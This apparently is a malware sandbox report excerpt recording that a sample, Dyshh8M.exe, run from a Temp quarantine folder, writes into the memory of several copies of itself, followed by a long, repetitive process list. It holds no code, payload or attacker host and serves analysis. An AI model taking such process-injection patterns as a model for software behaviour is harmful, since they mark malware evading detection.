PID 2308 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"


C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

